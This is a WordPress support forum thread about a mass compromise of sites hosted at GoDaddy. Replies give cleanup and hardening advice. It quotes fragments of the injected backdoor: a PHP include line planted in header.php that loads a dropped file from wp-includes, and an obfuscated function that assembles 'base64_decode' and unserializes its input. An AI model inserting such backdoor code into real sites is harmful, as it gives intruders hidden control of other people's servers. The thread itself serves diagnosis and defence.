Title: header.php file getting hacked
Last modified: August 21, 2016

---

# header.php file getting hacked

 *  [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * (@shawn00m)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/)
 * I’m experiencing a hacking problem with most of my WordPress installations. There
   are two things that are happening. First a new php file is uploaded to the wp-
   includes folder. What this file does, I do not know. I don’t understand PHP well
   enough. I would be happy to share it if if would help.
 * The second thing is a piece of code that is inserted after the opening body tag
   in the header.php file. Here is a sample of this code:
    `<?php /* start_extra_placement_*/
   @include_once("/home/content/54/9357554/html/wp-includes/Oyk5.php"); /* end_extra_placement_*/?
   >`
 * This problem is across multiple hosting accounts, although they are all hosted
   at GoDaddy. If anyone has any insights as to how these hackers are getting in
   and how I can prevent them from coming back, I would love to know. Thank you.

Viewing 10 replies - 1 through 10 (of 10 total)

 *  [Pioneer Web Design](https://wordpress.org/support/users/swansonphotos/)
 * (@swansonphotos)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709307)
 * It may prove beneficial to the community to use pastebin.com to share that file
   by linking to it here and also use Sucuri to scan your site and share any results
   also.
 *  Thread Starter [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * (@shawn00m)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709319)
 * Thank you for your reply. Here is a link to the file at pastebin:
    [**Moderator
   Note: Removed link to code used to exploit site**_]_
 *  [Pioneer Web Design](https://wordpress.org/support/users/swansonphotos/)
 * (@swansonphotos)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709378)
 * Please rebuild site:
 *     ```
       function current($token)
           {
               $func = 'ba' . 'se' . '6' . '4' . '_' . 'de' . 'co' . 'de';
               return unserialize($func($token));
           }
       ```
   
 * Is malicious base64 eval code.
 *  [The Hack Repair Guy](https://wordpress.org/support/users/tvcnet/)
 * (@tvcnet)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709471)
 * You site has been compromised.
 * Start by changing all passwords (FTP/godddy/admins).
 * Then update WordPress, plugins and themes.
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709472)
 * You need to start working your way through these resources:
    [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Anything less will probably result in the hacker walking straight back into your
   site again.
 * Additional Resources:
    [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/) 
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 *  Thread Starter [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * (@shawn00m)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709473)
 * Seacoast Web Design, I’m not understanding your comment.
 * To others, I know my site was hacked. 13 of my sites were hacked on the same 
   day at the same time over various hosting accounts. This isn’t one site with 
   one PW.
 * My questions:
 * Has anyone ever experienced something similar?
    Any suggestions on how all of
   the sites were hit simultaneously? Any advice to prevent it from happening again?
 * Thank you.
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709475)
 * > Has anyone ever experienced something similar?
 * We see hacked sites every day here, unfortunately. 🙁
 * > Any suggestions on how all of the sites were hit simultaneously?
 * Were they all on the same server or with the same hosts? Many hosts experienced
   problems due to [ mass attacks](http://blog.hostgator.com/2013/04/11/global-wordpress-brute-force-flood/)
   recently. Your hosts may have been one of them.
 * > Any advice to prevent it from happening again?
 * Review [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress) 
   as suggested above.
 *  Thread Starter [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * (@shawn00m)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709479)
 * Thanks esmi. There were a total of 13 sites hacked on 5 different hosting accounts–
   all of them at GoDaddy – all at 5:17pm on May 18.
 * A colleague of mine had the same issue the next day with 11 of his WP sites on
   4 different hosting accounts – again all at GoDaddy.
 * The big difference between his attacks and mine is that his hack included the
   installation of content and links related to ED medication. This caused one of
   his sites to get flagged by Google. None of mine experienced that, but the method
   was otherwise almost identical.
 * While I’m trying to get help to prevent this, I also am trying to alert people
   to look at their sites for a similar attack. I wouldn’t have known I was hacked
   if my colleague didn’t tell me about his hacks. After seeing his sites, I checked
   my own and found the offending code.
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709486)
 * > all of them at GoDaddy – all at 5:17pm on May 18
 * GoDaddy were definitely one of the hosts hit by the mass attacks. I assume you
   meant April 18 – not May 18, yes? If not, I’d like a ride in your time machine.
   😉
 *  Thread Starter [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * (@shawn00m)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709519)
 * esmi, yes, it was April 18, not May 18. I wish I had a time machine to go back
   and catch the bums that did this. Thanks for your info. The Hardening WordPress
   info is helpful.
 * I also found a plugin called Better WP Security. It does many of the things suggested
   on that page. Are you – or anyone reading this – familiar with it?

Viewing 10 replies - 1 through 10 (of 10 total)

The topic ‘header.php file getting hacked’ is closed to new replies.

## Tags

 * [header](https://wordpress.org/support/topic-tag/header/)
 * [header.php](https://wordpress.org/support/topic-tag/header-php/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 10 replies
 * 4 participants
 * Last reply from: [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * Last activity: [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709519)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics